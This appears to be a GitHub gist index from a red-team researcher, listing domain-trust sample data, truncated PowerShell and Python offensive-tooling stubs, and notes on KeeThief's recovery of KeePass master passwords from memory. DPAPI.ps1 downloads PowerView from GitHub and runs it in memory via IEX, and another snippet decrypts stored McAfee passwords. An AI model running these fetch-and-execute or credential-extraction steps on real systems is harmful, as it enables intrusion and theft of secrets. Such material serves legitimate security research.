Coding towards chaotic good while living on the decision boundary

Will Schroeder HarmJ0y
HarmJ0y / trusts.csv
Created December 29, 2014 06:20
Simple Domain Trust Output
SourceDomain,TargetDomain,TrustType,TrustDirection
finance.mothership.com,mothership.com,ParentChild,Bidirectional
mothership.com,corp.mothership.com,ParentChild,Bidirectional
mothership.com,finance.mothership.com,ParentChild,Bidirectional
mothership.com,engineering.mothership.com,ParentChild,Bidirectional
corp.mothership.com,mothership.com,ParentChild,Bidirectional
corp.mothership.com,subsidiary.com,External,Inbound
finance.mothership.com,mothership.com,ParentChild,Bidirectional
engineering.mothership.com,mothership.com,ParentChild,Bidirectional
subsidiary.com,product.subsidiary.com,ParentChild,Bidirectional
HarmJ0y / trusts_complex.csv
Created December 29, 2014 06:21
More Complex Domain Trust Example
SourceDomain,TargetDomain,TrustType,TrustDirection
finance.mothership.com,mothership.com,ParentChild,Bidirectional
mothership.com,corp.mothership.com,ParentChild,Bidirectional
mothership.com,finance.mothership.com,ParentChild,Bidirectional
mothership.com,contracts.mothership.com,ParentChild,Bidirectional
corp.mothership.com,mothership.com,ParentChild,Bidirectional
contracts.mothership.com,mothership.com,ParentChild,Bidirectional
contracts.mothership.com,product.othercompany.com,External,Inbound
product.othercompany.com,contracts.mothership.com,External,Outbound
product.othercompany.com,othercompany.com,ParentChild,Bidirectional
### Keybase proof
I hereby claim:
* I am harmj0y on github.
* I am harmj0y (https://keybase.io/harmj0y) on keybase.
* I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3
To claim this, I am signing this object:
HarmJ0y / Translate-Canonical.ps1
Created September 17, 2015 22:39
Translate-Canonical
function Translate-Canonical {
    <#
    .SYNOPSIS
    Converts a user@fqdn to NT4 format.
    .LINK
    http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats
    #>
    [CmdletBinding()]
    param(
        [String]$User
HarmJ0y / Get-DecryptedSitelistPassword.ps1
Created February 12, 2016 03:05
Get-DecryptedSitelistPassword.ps1
function Get-DecryptedSitelistPassword {
    # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/
    # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com)
    # port by @harmj0y
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        $B64Pass
    )
HarmJ0y / smb_hoster.py
Created June 4, 2015 00:39
smb_hoster.py
#!/usr/bin/python
from impacket import smbserver
import sys, argparse, threading, ConfigParser, time, os

class ThreadedSMBServer(threading.Thread):
    """
    Threaded SMB server that can be spun up locally.
    """
HarmJ0y / EncryptedStoreTests.ps1
Created August 31, 2016 22:28
Encrypted Store Tests
$RSA = New-RSAKeyPair

# local tests
$ComputerName = 'localhost'
$StorePath = 'C:\Temp\temp.bin'
Write-Host "`n[$ComputerName] AES Storepath : $StorePath"
".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!'
Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List
Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore
HarmJ0y / anon.ps1
Created April 18, 2016 05:06
anon.ps1
$GroupData = @{}
$UserData = @{}
$ServerData = @{}

Import-CSV .\DomainGroups.csv | ForEach-Object {
    if($GroupData[$_.GroupName]) {
        $_.GroupName = $GroupData[$_.GroupName]
    }
    else {
        $guid = ([guid]::NewGuid()).Guid
HarmJ0y / DPAPI.ps1
Created July 31, 2017 21:16
DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
HarmJ0y / KeeThief.markdown
Last active March 20, 2020 19:43
KeeThief clarification points

A few clarification points for the "KeeThief – A Case Study in Attacking KeePass Part 2" post:

  1. KeeThief doesn't require local administrator rights, only rights to access the KeePass.exe process space you're targeting.

  2. KeeThief.ps1 is fully self-contained (no dependencies and no files dropped to disk) and PowerShell Version 2 compliant (so it will work on Windows 7+).

  3. Secure desktop doesn't matter or come into play, as a keylogger isn't used or needed.

  4. This approach is different from KeeFarce - KeeThief recovers the plaintext master password and other key material from memory instead of calling internal methods to export the database contents.